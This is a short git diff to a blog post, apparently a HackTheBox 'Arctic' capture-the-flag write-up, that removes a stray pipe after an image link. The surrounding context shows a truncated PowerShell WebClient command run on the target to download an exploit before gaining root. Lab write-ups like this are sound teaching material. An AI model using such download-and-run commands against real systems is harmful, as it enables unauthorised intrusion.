Updated arctic post

--- a/_posts/HackTheBox/2020-04-13-arctic.md
+++ b/_posts/HackTheBox/2020-04-13-arctic.md
@@ -130,7 +130,7 @@ C:\Users\tolis\Desktop>powershell.exe -c "(New-Object System.Net.WebClient).Down
 | :--: |
 | *Running the exploit* |
 
-![image]({{site.github.url}}/assets/img/htb/arctic/root.png) |
+![image]({{site.github.url}}/assets/img/htb/arctic/root.png)
 
 
 Boom, root privelleges.
